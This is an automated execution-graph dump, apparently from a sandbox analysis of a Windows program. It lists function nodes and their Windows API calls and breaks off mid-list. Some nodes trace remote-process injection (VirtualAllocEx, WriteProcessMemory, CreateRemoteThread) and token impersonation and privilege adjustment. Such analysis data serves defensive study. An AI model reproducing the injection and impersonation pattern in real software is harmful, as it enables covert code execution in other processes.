                                                                  execution_graph 3613 40a3c1 EnumResourceNamesW 4521 407ec3 4522 407ed9 4521->4522 4523 407eca 4521->4523 4526 405b81 4523->4526 4527 405b8a 4526->4527 4529 405b8f 4526->4529 4543 405adf 4527->4543 4530 405bee 4529->4530 4531 405bbf GetModuleHandleW 4529->4531 4538 405cdb 4529->4538 4533 405c45 4530->4533 4534 405bf8 wcscpy 4530->4534 4532 405c58 LoadStringW 4531->4532 4541 405c63 4532->4541 4549 405ce7 4533->4549 4546 405edd memset _itow 4534->4546 4539 405c1a wcslen 4540 405c2c GetModuleHandleW 4539->4540 4539->4541 4540->4532 4541->4538 4542 405c84 memcpy 4541->4542 4542->4538 4544 405b80 4543->4544 4545 405aec ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 4543->4545 4544->4529 4545->4544 4552 405f39 4546->4552 4548 405c13 4548->4539 4548->4540 4550 405cf0 GetModuleHandleW 4549->4550 4551 405cf7 4549->4551 4550->4551 4551->4532 4553 40b550 4552->4553 4554 405f46 memset GetPrivateProfileStringW 4553->4554 4555 405f92 wcscpy 4554->4555 4556 405fa8 4554->4556 4555->4548 4556->4548 4557 40b644 4560 40b23c 4557->4560 4561 40b216 2 API calls 4560->4561 4562 40b245 4561->4562 3614 40b2c6 3633 40b4d4 3614->3633 3616 40b2d2 GetModuleHandleA 3617 40b2e2 __set_app_type __p__fmode __p__commode 3616->3617 3619 40b376 3617->3619 3620 40b38a 3619->3620 3621 40b37e __setusermatherr 3619->3621 3634 40b4c2 _controlfp 3620->3634 3621->3620 3623 40b38f _initterm __wgetmainargs _initterm 3624 40b3f0 GetStartupInfoW 3623->3624 3625 40b3e2 3623->3625 3627 40b438 GetModuleHandleA 3624->3627 3635 408533 3627->3635 3631 40b468 exit 3632 40b46f _cexit 3631->3632 3632->3625 3633->3616 3634->3623 3636 408543 3635->3636 3692 40313d LoadLibraryW 3636->3692 3638 40854b 3639 40854f 3638->3639 3701 40ac52 3638->3701 3639->3631 3639->3632 3642 408592 3707 4056b5 3642->3707 3648 40585c _wcsicmp 3658 40864f 3648->3658 3649 4085cd 3650 40861f swscanf 3649->3650 3649->3658 3730 40584c 3650->3730 3651 408727 3652 40585c _wcsicmp 3651->3652 3654 408735 3652->3654 3656 408823 3654->3656 3663 40875c ExpandEnvironmentStringsW wcschr 3654->3663 3660 402f31 36 API calls 3656->3660 3658->3648 3658->3651 3681 4054b9 free free 3658->3681 3758 4035fb 3658->3758 3761 4099d4 3658->3761 3764 402fc6 3658->3764 3773 402f31 memset 3658->3773 3783 40177c 3658->3783 3796 401d40 3658->3796 3662 408829 3660->3662 3665 40177c 20 API calls 3662->3665 3663->3656 3666 40877f memset memset GetCurrentDirectoryW wcslen wcslen 3663->3666 3668 408855 3665->3668 3669 4087fd wcscpy 3666->3669 3670 4087e8 3666->3670 3673 408895 3668->3673 3675 401d40 220 API calls 3668->3675 3669->3656 3804 404be4 wcscpy 3670->3804 3676 40585c _wcsicmp 3673->3676 3675->3673 3678 4088b1 3676->3678 3679 4088b5 3678->3679 3680 4088bf 3678->3680 3807 4065be memset 3679->3807 3812 406420 memset 3680->3812 3681->3658 3688 408910 6 API calls 3689 4088fd 3688->3689 3690 402f31 36 API calls 3689->3690 3691 408904 CoUninitialize 3690->3691 3693 403190 #17 3692->3693 3694 403168 GetProcAddress 3692->3694 3697 403199 3693->3697 3695 403181 FreeLibrary 3694->3695 3696 403178 3694->3696 3695->3693 3698 40318c 3695->3698 3696->3695 3699 4031a0 MessageBoxW 3697->3699 3700 4031b7 3697->3700 3698->3697 3699->3638 3700->3638 3702 40855e SetErrorMode GetModuleHandleW EnumResourceTypesW 3701->3702 3703 40ac5b 3701->3703 3702->3642 3821 405436 memset 3703->3821 3706 40ac6f GetProcAddress 3706->3702 3835 4054b9 free free 3707->3835 3709 405830 3836 4055d1 3709->3836 3712 405807 3712->3709 3857 40559a 3712->3857 3713 40559a malloc memcpy free free 3720 4056f7 3713->3720 3716 4057a3 free 3716->3720 3719 4054df 7 API calls 3719->3709 3720->3709 3720->3712 3720->3713 3720->3716 3839 4054df wcslen 3720->3839 3849 404951 3720->3849 3721 408f48 3862 408fc9 GetCurrentProcess 3721->3862 3724 408f64 FreeLibrary 3725 4085bd 3724->3725 3726 40585c 3725->3726 3727 405883 3726->3727 3728 405864 3726->3728 3727->3649 3728->3727 3729 40586d _wcsicmp 3728->3729 3729->3727 3729->3728 3731 405851 _wtoi 3730->3731 3732 401ac9 3731->3732 3889 40b550 3732->3889 3735 401af2 3891 40171f 3735->3891 3736 401c15 GetLastError 3738 401c13 3736->3738 3738->3658 3740 401b20 3894 405642 3740->3894 3741 401bf7 GetLastError 3743 401bff FindCloseChangeNotification 3741->3743 3745 4055d1 free 3743->3745 3744 401b2b memset _snwprintf 3746 4055d1 free 3744->3746 3745->3738 3747 401b82 3746->3747 3748 40559a 4 API calls 3747->3748 3749 401ba0 ReadProcessMemory 3748->3749 3751 401bc8 3749->3751 3899 4055f9 3751->3899 3756 4055d1 free 3757 401bf5 3756->3757 3757->3743 3759 403614 3758->3759 3760 40360a FreeLibrary 3758->3760 3759->3658 3760->3759 3762 4099e1 3761->3762 3763 4099da free 3761->3763 3762->3658 3763->3762 4373 40a0eb wcscpy 3764->4373 3770 40177c 20 API calls 3772 403049 3770->3772 3771 403020 3771->3770 3772->3658 4396 404ad9 GetModuleFileNameW 3773->4396 3775 402f65 wcsrchr 3776 402f7a 3775->3776 3777 402f7e wcscat 3775->3777 3776->3777 3778 402fa1 3777->3778 3779 402fb2 3777->3779 3781 404923 2 API calls 3778->3781 3780 402fc6 30 API calls 3779->3780 3782 402fc2 3780->3782 3781->3779 3782->3658 4397 40a0d7 wcscpy 3783->4397 3785 401790 3786 401a29 3785->3786 4398 40a0d7 wcscpy 3785->4398 3786->3658 3788 4019e2 3789 401a04 3788->3789 3793 40135c 13 API calls 3788->3793 4399 401676 3789->4399 3792 401a21 4409 4054b9 free free 3792->4409 3793->3789 3797 401d4c 3796->3797 3803 401d5c 3796->3803 3799 4022d5 210 API calls 3797->3799 3801 401d55 3799->3801 3800 401d90 3800->3658 3802 404baf GetVersionExW 3801->3802 3802->3803 3803->3800 4410 401c26 GetCurrentProcessId memset memset 3803->4410 3805 4047af 2 API calls 3804->3805 3806 404bf6 wcscat 3805->3806 3806->3669 4417 406597 3807->4417 3809 4065f1 GetModuleHandleW 4422 40645e 3809->4422 3813 406597 3 API calls 3812->3813 3814 406450 3813->3814 4496 406398 3814->4496 3817 408910 3818 408924 3817->3818 3819 4055f9 6 API calls 3818->3819 3820 4088df 3819->3820 3820->3688 3828 404c3c 3821->3828 3823 405467 3831 4047af wcslen 3823->3831 3826 405494 3826->3702 3826->3706 3827 40548f LoadLibraryW 3827->3826 3829 404c4c GetSystemDirectoryW 3828->3829 3830 404c5d wcscpy 3828->3830 3829->3830 3830->3823 3832 4047ba 3831->3832 3833 4047cf wcscat LoadLibraryW 3831->3833 3832->3833 3834 4047c2 wcscat 3832->3834 3833->3826 3833->3827 3834->3833 3835->3720 3837 4055e4 3836->3837 3838 4055d7 free 3836->3838 3837->3721 3838->3837 3840 405516 3839->3840 3841 40550d free 3839->3841 3843 404951 3 API calls 3840->3843 3842 405520 3841->3842 3844 405530 free 3842->3844 3845 405539 3842->3845 3843->3842 3846 405545 memcpy 3844->3846 3847 404951 3 API calls 3845->3847 3846->3720 3848 405544 3847->3848 3848->3846 3850 404958 malloc 3849->3850 3851 40499e 3849->3851 3853 404994 3850->3853 3854 404979 3850->3854 3851->3720 3853->3720 3855 40498d free 3854->3855 3856 40497d memcpy 3854->3856 3855->3853 3856->3855 3858 4055b4 3857->3858 3859 4055a9 free 3857->3859 3860 404951 3 API calls 3858->3860 3861 4055bf 3859->3861 3860->3861 3861->3719 3878 408f92 3862->3878 3865 408ff2 3884 408f72 3865->3884 3866 408fea GetLastError 3867 408f5c 3866->3867 3867->3724 3867->3725 3869 408ff9 3870 409005 GetProcAddress 3869->3870 3871 40901c 3869->3871 3870->3871 3872 409012 LookupPrivilegeValueW 3870->3872 3873 408f72 8 API calls 3871->3873 3872->3871 3874 409035 3873->3874 3875 409053 GetLastError FindCloseChangeNotification 3874->3875 3876 409039 GetProcAddress 3874->3876 3875->3867 3876->3875 3877 409046 AdjustTokenPrivileges 3876->3877 3877->3875 3879 408f72 8 API calls 3878->3879 3880 408f9d 3879->3880 3881 408fa1 GetProcAddress 3880->3881 3882 408fc2 3880->3882 3881->3882 3883 408fb2 3881->3883 3882->3865 3882->3866 3883->3882 3885 408f77 3884->3885 3886 408f8e 3884->3886 3887 405436 8 API calls 3885->3887 3886->3869 3888 408f81 3887->3888 3888->3869 3890 401ad6 OpenProcess 3889->3890 3890->3735 3890->3736 3982 404fa4 memset 3891->3982 3893 401745 ReadProcessMemory 3893->3740 3893->3741 3895 405648 3894->3895 3896 40564b 3894->3896 3895->3744 3897 405652 wcslen 3896->3897 3898 40565a 3896->3898 3897->3744 3898->3744 3900 405603 3899->3900 3901 401bdc 3899->3901 3902 405614 3900->3902 3903 405608 wcslen 3900->3903 3907 4022d5 3901->3907 3904 40559a 4 API calls 3902->3904 3903->3902 3905 40561d 3904->3905 3905->3901 3906 405621 memcpy 3905->3906 3906->3901 3908 40b550 3907->3908 3909 4022e2 memset memset memset 3908->3909 3983 404923 wcslen 3909->3983 3911 402383 wcschr 3912 4023a6 3911->3912 3913 402397 ExpandEnvironmentStringsW 3911->3913 3914 402419 3912->3914 3915 4023ae wcschr 3912->3915 3913->3912 3917 402425 wcschr 3914->3917 3918 40244b 3914->3918 3915->3914 3916 4023c2 memset SearchPathW 3915->3916 3916->3914 3919 402405 3916->3919 3920 40245d 3917->3920 3921 402436 ExpandEnvironmentStringsW 3917->3921 4042 404b5c wcscpy wcsrchr 3918->4042 3923 404923 2 API calls 3919->3923 3924 402537 3920->3924 3926 4024ad memset memset 3920->3926 3921->3920 3923->3914 3925 4025da 3924->3925 3928 402550 memset memset 3924->3928 3929 40265d 3925->3929 3932 402633 3925->3932 3933 4025ed wcschr 3925->3933 4044 4052f3 3926->4044 3931 4052f3 2 API calls 3928->3931 3936 402683 3929->3936 4050 401d1e 3929->4050 3937 402598 3931->3937 3934 402634 _snwprintf 3932->3934 3933->3932 3938 4025fb memset ExpandEnvironmentStringsW 3933->3938 3934->3929 3935 4052f3 2 API calls 3939 40250b _wtoi _wtoi 3935->3939 3941 4026a3 3936->3941 3944 401d1e 4 API calls 3936->3944 3942 4052f3 2 API calls 3937->3942 3938->3934 3939->3924 3945 401d1e 4 API calls 3941->3945 3946 4026c6 3941->3946 3943 4025ae _wtoi _wtoi 3942->3943 3943->3925 3944->3941 3945->3946 3947 401d1e 4 API calls 3946->3947 3948 402707 3946->3948 3947->3948 3949 40276d 3948->3949 3953 402712 3948->3953 3950 402776 3949->3950 3951 40280b SetEnvironmentVariableW 3949->3951 4086 40149f GetEnvironmentStringsW 3950->4086 3973 402768 3951->3973 4056 40135c 3953->4056 3958 40273d 4077 401421 3958->4077 3959 402792 3967 40135c 13 API calls 3959->3967 3960 40288e 3961 4055d1 free 3960->3961 3964 401beb 3961->3964 3964->3756 3965 402748 4085 4054b9 free free 3965->4085 3970 4027a9 3967->3970 4092 401551 3970->4092 3986 401fe6 3973->3986 3975 4027cb 3977 401421 10 API calls 3975->3977 3976 4014e9 12 API calls 3976->3975 3978 4027d6 3977->3978 4109 4054b9 free free 3978->4109 3980 4027f9 4110 4054b9 free free 3980->4110 3982->3893 3984 404934 3983->3984 3985 404937 memcpy 3983->3985 3984->3985 3985->3911 3987 4020a8 3986->3987 3988 402008 memset memset 3986->3988 3989 4020f3 3987->3989 3990 4020ad wcslen 3987->3990 3991 404c3c 2 API calls 3988->3991 3993 402162 3989->3993 3994 4020f8 3989->3994 3995 4020c2 3990->3995 4029 4022c8 3990->4029 3992 402049 wcslen wcslen 3991->3992 3996 402070 3992->3996 3997 402087 3992->3997 3998 4021f2 3993->3998 3999 40216b OpenSCManagerW 3993->3999 4165 40598b 3994->4165 4013 4020e6 3995->4013 4014 4020d7 _wtoi 3995->4014 4001 404be4 4 API calls 3996->4001 4010 401df9 63 API calls 3997->4010 4002 402235 3998->4002 4003 4021f7 3998->4003 4004 402183 3999->4004 4005 40217d 3999->4005 4001->3997 4011 4022a0 CreateProcessW 4002->4011 4012 40223a 4002->4012 4181 401d99 wcslen 4003->4181 4123 401f04 memset memset 4004->4123 4117 401306 OpenServiceW 4005->4117 4027 4020a6 4010->4027 4017 402271 4011->4017 4020 402264 4012->4020 4021 402256 wcschr 4012->4021 4015 401df9 63 API calls 4013->4015 4151 401e44 OpenProcess 4014->4151 4015->4027 4024 4022c2 GetLastError 4017->4024 4017->4029 4019 401e44 11 API calls 4019->4027 4225 40289f 4020->4225 4021->4020 4023 402209 4194 40a46c 4023->4194 4024->4029 4027->4029 4034 4028ed 5 API calls 4027->4034 4029->3960 4111 401a3f memset 4029->4111 4033 4021e7 RevertToSelf 4033->4029 4036 402147 4034->4036 4038 402154 CloseHandle 4036->4038 4039 40214b GetLastError 4036->4039 4038->4029 4039->4038 4040 4021d5 GetLastError 4041 4021de CloseHandle 4040->4041 4041->4033 4043 404b75 4042->4043 4043->3920 4045 4024f5 4044->4045 4046 40530f 4044->4046 4045->3935 4047 40531b wcschr 4046->4047 4048 40532d 4046->4048 4047->4046 4047->4048 4048->4045 4049 40535e memcpy 4048->4049 4049->4045 4051 401d31 4050->4051 4052 401d27 4050->4052 4053 4050e1 4 API calls 4051->4053 4353 4050e1 wcslen wcslen 4052->4353 4055 401d3b 4053->4055 4055->3936 4358 4054b9 free free 4056->4358 4058 40136f wcslen 4059 40559a 4 API calls 4058->4059 4065 40139a 4059->4065 4061 4013d2 4062 4055d1 free 4061->4062 4064 4013da 4062->4064 4063 4054df 7 API calls 4063->4065 4064->3958 4066 4014e9 4064->4066 4065->4061 4065->4063 4359 4053a6 4065->4359 4363 40565d 4066->4363 4068 401516 4069 40565d 7 API calls 4068->4069 4070 401523 4069->4070 4071 40565d 7 API calls 4070->4071 4072 40152e 4071->4072 4073 4054df 7 API calls 4072->4073 4074 401543 4073->4074 4075 4055d1 free 4074->4075 4076 40154b 4075->4076 4076->3958 4078 4055f9 6 API calls 4077->4078 4083 401432 4078->4083 4079 401475 4080 405642 wcslen 4079->4080 4081 40147c 4080->4081 4081->3965 4082 401442 wcschr 4082->4083 4083->4079 4083->4082 4084 40565d 7 API calls 4083->4084 4084->4083 4085->3973 4370 4054b9 free free 4086->4370 4088 4014b5 4089 4014dc FreeEnvironmentStringsW 4088->4089 4090 4014cf wcslen 4088->4090 4091 4054df 7 API calls 4088->4091 4089->3959 4090->4088 4090->4089 4091->4088 4107 401561 4092->4107 4093 40161c 4371 4054b9 free free 4093->4371 4095 401660 4098 4055d1 free 4095->4098 4096 40488d wcslen wcslen _memicmp 4096->4107 4097 401623 4100 4054df 7 API calls 4097->4100 4101 401641 4097->4101 4099 401668 4098->4099 4372 4054b9 free free 4099->4372 4100->4097 4101->4095 4104 4054df 7 API calls 4101->4104 4103 4055f9 6 API calls 4103->4107 4104->4101 4105 401670 4105->3975 4105->3976 4106 4054df 7 API calls 4106->4107 4107->4093 4107->4096 4107->4103 4107->4106 4108 4015e3 _wcsnicmp 4107->4108 4108->4107 4109->3980 4110->3973 4112 4052f3 2 API calls 4111->4112 4113 401a8a 4112->4113 4114 401ac0 GetProcessAffinityMask SetProcessAffinityMask 4113->4114 4115 401a8f _wtoi 4113->4115 4114->3960 4116 4052f3 2 API calls 4115->4116 4116->4113 4118 401350 CloseServiceHandle 4117->4118 4119 40132d QueryServiceStatus 4117->4119 4118->4004 4120 40133c 4119->4120 4121 40134d CloseServiceHandle 4119->4121 4120->4121 4122 401342 StartServiceW 4120->4122 4121->4118 4122->4121 4124 404c3c 2 API calls 4123->4124 4125 401f53 wcslen wcslen 4124->4125 4126 401f8d 4125->4126 4127 401f7a 4125->4127 4129 401df9 63 API calls 4126->4129 4128 404be4 4 API calls 4127->4128 4128->4126 4130 401fae 4129->4130 4131 401fdd 4130->4131 4132 408f48 18 API calls 4130->4132 4131->4029 4136 401df9 4131->4136 4133 401fbe ImpersonateLoggedOnUser 4132->4133 4134 401fd4 CloseHandle 4133->4134 4135 401fcc GetLastError 4133->4135 4134->4131 4135->4134 4137 401e0a 4136->4137 4228 4095fd 4137->4228 4139 401e10 4249 409978 4139->4249 4142 401e2e 4254 4095da 4142->4254 4143 401e1f 4144 401e44 11 API calls 4143->4144 4145 401e2c 4144->4145 4145->4142 4148 4028ed 4149 40289f 5 API calls 4148->4149 4150 4021d1 4149->4150 4150->4040 4150->4041 4152 401ef3 GetLastError 4151->4152 4153 401e6d 4151->4153 4155 401efb 4152->4155 4154 40289f 5 API calls 4153->4154 4156 401e7e 4154->4156 4155->4027 4157 401ee0 GetLastError 4156->4157 4158 401e98 4156->4158 4160 401ee8 CloseHandle 4157->4160 4159 40289f 5 API calls 4158->4159 4161 401ea3 4159->4161 4160->4155 4162 401ec1 4161->4162 4163 401ecd GetLastError 4161->4163 4164 401ed5 CloseHandle 4162->4164 4163->4164 4164->4160 4309 4095ab 4165->4309 4167 40599f memset 4168 4095fd 49 API calls 4167->4168 4173 4059c6 4168->4173 4169 405a7b 4170 4095da 2 API calls 4169->4170 4171 402103 4170->4171 4171->4019 4171->4029 4173->4169 4174 4059f0 _wcsicmp 4173->4174 4310 409a94 memset memset OpenProcess 4173->4310 4175 405a05 wcschr 4174->4175 4176 405a2b OpenProcess 4174->4176 4175->4173 4177 405a19 _wcsicmp 4175->4177 4176->4173 4178 405a42 OpenProcessToken 4176->4178 4177->4173 4177->4176 4179 405a60 CloseHandle 4178->4179 4180 405a56 CloseHandle 4178->4180 4179->4169 4179->4173 4180->4179 4182 401de9 4181->4182 4183 401daf 4181->4183 4182->4023 4182->4029 4184 401dc5 4183->4184 4185 401dbc _wtoi 4183->4185 4186 4095fd 49 API calls 4184->4186 4185->4182 4187 401dd3 4186->4187 4188 409978 2 API calls 4187->4188 4189 401ddc 4188->4189 4190 401de2 4189->4190 4191 401ded 4189->4191 4192 4095da 2 API calls 4190->4192 4193 4095da 2 API calls 4191->4193 4192->4182 4193->4182 4195 40b550 4194->4195 4196 40a479 OpenProcess 4195->4196 4197 40a4a0 memset GetModuleHandleW 4196->4197 4198 40a6f1 GetLastError 4196->4198 4340 409c70 4197->4340 4200 402225 4198->4200 4200->4029 4202 40a4e5 4204 409c70 6 API calls 4202->4204 4203 40a4ea GetProcAddress 4203->4202 4205 40a4fb 4204->4205 4206 40a50b GetProcAddress 4205->4206 4207 40a506 4205->4207 4206->4207 4208 40a549 4207->4208 4209 404923 2 API calls 4207->4209 4210 40a56a 4208->4210 4211 404923 2 API calls 4208->4211 4209->4208 4212 40a58e VirtualAllocEx VirtualAllocEx 4210->4212 4214 404923 2 API calls 4210->4214 4211->4210 4215 40a6e4 GetLastError 4212->4215 4216 40a5dd 4212->4216 4214->4212 4215->4200 4216->4215 4217 40a5e5 WriteProcessMemory WriteProcessMemory 4216->4217 4344 40a272 GetVersionExW 4217->4344 4220 40a650 GetLastError 4222 40a65b memset ReadProcessMemory VirtualFreeEx VirtualFreeEx 4220->4222 4221 40a634 ResumeThread WaitForSingleObject CloseHandle 4221->4222 4223 40a6af 4222->4223 4223->4200 4224 40a6d9 FreeLibrary 4223->4224 4224->4200 4226 4028a5 LoadLibraryW GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4225->4226 4227 4028ec 4225->4227 4226->4227 4227->4017 4229 4099d4 free 4228->4229 4230 409614 CreateToolhelp32Snapshot memset Process32FirstW 4229->4230 4231 409782 Process32NextW 4230->4231 4232 409654 4231->4232 4233 409799 CloseHandle 4231->4233 4234 40965f OpenProcess 4232->4234 4233->4139 4235 4096b2 memset 4234->4235 4236 40968a 4234->4236 4261 4098f9 4235->4261 4240 409773 4236->4240 4241 409699 OpenProcess 4236->4241 4288 404baf 4236->4288 4239 4096df 4242 4096f7 GetModuleHandleW 4239->4242 4246 40972a QueryFullProcessImageNameW 4239->4246 4266 40920a 4239->4266 4282 409555 4239->4282 4291 4099ed 4240->4291 4241->4235 4241->4240 4242->4239 4245 409706 GetProcAddress 4242->4245 4245->4239 4246->4239 4248 409764 CloseHandle 4248->4240 4250 401e1b 4249->4250 4252 409988 4249->4252 4250->4142 4250->4143 4251 409993 _wcsicmp 4251->4250 4251->4252 4252->4250 4252->4251 4253 4099b1 _wcsicmp 4252->4253 4253->4250 4253->4252 4255 4095e0 FreeLibrary 4254->4255 4256 4095ea 4254->4256 4255->4256 4257 4099d4 free 4256->4257 4258 4095f3 4257->4258 4259 4099d4 free 4258->4259 4260 401e36 4259->4260 4260->4033 4260->4148 4297 409921 4261->4297 4264 409909 K32GetModuleFileNameExW 4265 40991c 4264->4265 4265->4239 4267 40921d wcschr 4266->4267 4269 40921a wcscpy 4266->4269 4267->4269 4270 40923f 4267->4270 4271 4092eb 4269->4271 4302 40488d wcslen wcslen 4270->4302 4271->4239 4274 409255 memset 4306 404c08 4274->4306 4275 409297 4277 4092e2 wcscpy 4275->4277 4278 40929d memset 4275->4278 4277->4271 4279 404c08 2 API calls 4278->4279 4281 4092c2 memcpy wcscat 4279->4281 4280 40927a wcscpy wcscat 4280->4271 4281->4271 4283 409561 GetModuleHandleW 4282->4283 4284 40958b 4282->4284 4283->4284 4287 409570 GetProcAddress 4283->4287 4285 409594 GetProcessTimes 4284->4285 4286 4095a7 4284->4286 4285->4248 4286->4248 4287->4284 4289 404bbe GetVersionExW 4288->4289 4290 404bcf 4288->4290 4289->4290 4290->4236 4292 4099f8 4291->4292 4295 409a1c 4291->4295 4293 409a01 free 4292->4293 4294 409a0a 4292->4294 4293->4295 4296 404951 3 API calls 4294->4296 4295->4231 4296->4295 4298 409926 4297->4298 4299 409901 4297->4299 4300 405436 8 API calls 4298->4300 4299->4264 4299->4265 4301 409931 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4300->4301 4301->4299 4303 4048b4 4302->4303 4304 4048d8 4302->4304 4303->4304 4305 4048bc _memicmp 4303->4305 4304->4274 4304->4275 4305->4303 4305->4304 4307 404c18 GetWindowsDirectoryW 4306->4307 4308 404c29 wcscpy 4306->4308 4307->4308 4308->4280 4309->4167 4311 409af6 4310->4311 4312 409c3a 4310->4312 4315 408f92 9 API calls 4311->4315 4313 409c43 _snwprintf 4312->4313 4314 409c67 4312->4314 4313->4314 4314->4173 4316 409b0b 4315->4316 4317 409b16 memset 4316->4317 4318 409b99 4316->4318 4319 408f72 8 API calls 4317->4319 4320 409555 3 API calls 4318->4320 4321 409b3b 4319->4321 4322 409bb1 memset 4320->4322 4323 409c23 CloseHandle 4321->4323 4324 409b43 GetProcAddress 4321->4324 4329 409a46 4322->4329 4323->4312 4326 409c31 FreeLibrary 4323->4326 4324->4323 4327 409b59 4324->4327 4326->4312 4327->4323 4335 40906d 4327->4335 4330 409a71 4329->4330 4331 409a51 4329->4331 4330->4327 4332 405436 8 API calls 4331->4332 4333 409a5b 4332->4333 4333->4330 4334 409a62 GetProcAddress 4333->4334 4334->4330 4336 408f72 8 API calls 4335->4336 4337 40907b 4336->4337 4338 409090 4337->4338 4339 40907f GetProcAddress 4337->4339 4338->4323 4339->4338 4341 409c82 GetModuleHandleW GetProcAddress 4340->4341 4342 409d0b 4340->4342 4341->4342 4343 409cb3 GetModuleHandleW GetProcAddress strlen strlen 4341->4343 4342->4202 4342->4203 4343->4342 4345 40a31d CreateRemoteThread 4344->4345 4346 40a29f 4344->4346 4348 40a2a4 4345->4348 4349 40a1ef 4346->4349 4348->4220 4348->4221 4350 40a1fa LoadLibraryW 4349->4350 4351 40a26d 4349->4351 4350->4351 4352 40a20f GetProcAddress 4350->4352 4351->4348 4352->4351 4354 405101 wcscat 4353->4354 4355 405112 4353->4355 4356 40512b 4354->4356 4355->4356 4357 40511a wcsncat 4355->4357 4356->4051 4357->4356 4358->4058 4360 4053bf 4359->4360 4362 4053bb 4359->4362 4361 4053f3 memcpy 4360->4361 4360->4362 4361->4362 4362->4065 4364 405642 wcslen 4363->4364 4365 40566c 4364->4365 4366 405681 4365->4366 4367 405676 wcslen 4365->4367 4368 40559a 4 API calls 4366->4368 4367->4366 4369 40568c memcpy 4368->4369 4369->4068 4370->4088 4371->4097 4372->4105 4384 40a0d7 wcscpy 4373->4384 4375 402ff9 4376 403616 4375->4376 4377 403621 4376->4377 4378 40362e memset 4376->4378 4379 403005 4377->4379 4385 402caf 4377->4385 4381 40362c 4378->4381 4379->3771 4383 40a0d7 wcscpy 4379->4383 4381->4379 4388 402bee 4381->4388 4383->3771 4384->4375 4386 402cb6 GetWindowPlacement 4385->4386 4387 402ccd 4385->4387 4386->4387 4387->4381 4389 402cab 4388->4389 4390 402bfe 4388->4390 4389->4379 4390->4389 4391 402c08 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 4390->4391 4392 402c46 GetSystemMetrics GetSystemMetrics 4391->4392 4393 402c39 4391->4393 4394 402c3e 4392->4394 4393->4392 4393->4394 4394->4389 4395 402c97 SetWindowPos 4394->4395 4395->4389 4396->3775 4397->3785 4398->3788 4400 401683 4399->4400 4401 4016aa _snwprintf 4400->4401 4402 4054df 7 API calls 4400->4402 4403 401719 4400->4403 4401->4400 4402->4400 4403->3792 4404 4013e1 4403->4404 4405 4055f9 6 API calls 4404->4405 4408 4013f2 4405->4408 4406 40141e 4406->3792 4407 40565d 7 API calls 4407->4408 4408->4406 4408->4407 4409->3786 4416 404ad9 GetModuleFileNameW 4410->4416 4412 401c79 _snwprintf memset ShellExecuteExW 4413 401ce2 WaitForSingleObject GetExitCodeProcess 4412->4413 4414 401d0e GetLastError 4412->4414 4415 401d00 4413->4415 4414->4415 4415->3800 4416->4412 4441 404ad9 GetModuleFileNameW 4417->4441 4419 40659d wcsrchr 4420 4065b0 wcscat 4419->4420 4421 4065ac 4419->4421 4420->3809 4421->4420 4423 40b550 4422->4423 4424 40646b memset memset 4423->4424 4442 404ad9 GetModuleFileNameW 4424->4442 4426 4064b4 4443 40b04d GetFileVersionInfoSizeW 4426->4443 4429 4064d6 wcscpy 4430 4064eb wcscpy wcscpy 4429->4430 4470 405fac 4430->4470 4433 405fac 3 API calls 4434 40652a 4433->4434 4435 405fac 3 API calls 4434->4435 4436 406540 4435->4436 4437 405fac 3 API calls 4436->4437 4438 406553 EnumResourceNamesW EnumResourceNamesW wcscpy 4437->4438 4476 406337 4438->4476 4441->4419 4442->4426 4444 40b073 4443->4444 4445 4064d2 4443->4445 4446 40b07b ??2@YAPAXI GetFileVersionInfoW VerQueryValueW 4444->4446 4445->4429 4445->4430 4447 40b0d0 VerQueryValueW 4446->4447 4448 40b0aa 4446->4448 4449 40b0e7 _snwprintf 4447->4449 4450 40b11f wcscpy 4447->4450 4448->4447 4483 40afbe wcscpy wcscat wcscat wcscat VerQueryValueW 4449->4483 4451 40b12f 4450->4451 4453 40afbe 9 API calls 4451->4453 4455 40b141 4453->4455 4456 40afbe 9 API calls 4455->4456 4457 40b156 4456->4457 4458 40afbe 9 API calls 4457->4458 4459 40b16b 4458->4459 4460 40afbe 9 API calls 4459->4460 4461 40b180 4460->4461 4462 40afbe 9 API calls 4461->4462 4463 40b195 4462->4463 4464 40afbe 9 API calls 4463->4464 4465 40b1aa 4464->4465 4466 40afbe 9 API calls 4465->4466 4467 40b1bf 4466->4467 4468 40afbe 9 API calls 4467->4468 4469 40b1d4 ??3@YAXPAX 4468->4469 4469->4445 4471 40b550 4470->4471 4472 405fb9 memset GetPrivateProfileStringW 4471->4472 4473 406013 WritePrivateProfileStringW 4472->4473 4474 406009 4472->4474 4475 40600f 4473->4475 4474->4473 4474->4475 4475->4433 4477 40b550 4476->4477 4478 406344 memset 4477->4478 4479 406363 LoadStringW 4478->4479 4480 40637d 4479->4480 4480->4479 4482 406395 4480->4482 4493 406025 memset _itow 4480->4493 4482->3680 4484 40b025 4483->4484 4485 40b041 4483->4485 4486 404923 2 API calls 4484->4486 4485->4450 4485->4451 4487 40b039 4486->4487 4489 4049a2 4487->4489 4490 4049b2 lstrcpyW lstrlenW 4489->4490 4491 4049aa 4489->4491 4492 4049c6 4490->4492 4491->4490 4491->4491 4492->4485 4494 405fac 3 API calls 4493->4494 4495 406059 4494->4495 4495->4480 4506 404aaa GetFileAttributesW 4496->4506 4498 4063a1 4499 4063a6 wcscpy wcscpy GetPrivateProfileIntW 4498->4499 4500 40641a CoInitialize 4498->4500 4507 405f14 GetPrivateProfileStringW 4499->4507 4500->3817 4502 4063f5 4508 405f14 GetPrivateProfileStringW 4502->4508 4504 406406 4509 405f14 GetPrivateProfileStringW 4504->4509 4506->4498 4507->4502 4508->4504 4509->4500 4563 406cca 4564 406ce1 4563->4564 4566 406cdc 4563->4566 4567 4031e2 4564->4567 4570 4032f6 SendMessageW 4567->4570 4569 4031fb 4569->4566 4570->4569 4571 403fca 4624 40297e 4571->4624 4574 40297e 2 API calls 4575 404007 4574->4575 4576 40297e 2 API calls 4575->4576 4577 40401c 4576->4577 4627 402a06 4577->4627 4582 4029cb 7 API calls 4583 40404f 4582->4583 4584 4029cb 7 API calls 4583->4584 4585 404061 4584->4585 4586 4029cb 7 API calls 4585->4586 4587 404073 4586->4587 4588 4029cb 7 API calls 4587->4588 4589 404085 4588->4589 4590 4029cb 7 API calls 4589->4590 4591 404097 4590->4591 4643 402952 4591->4643 4594 402952 2 API calls 4595 4040bd 4594->4595 4596 402952 2 API calls 4595->4596 4597 4040d0 4596->4597 4598 402952 2 API calls 4597->4598 4599 4040e3 4598->4599 4600 402952 2 API calls 4599->4600 4601 4040f6 4600->4601 4602 402952 2 API calls 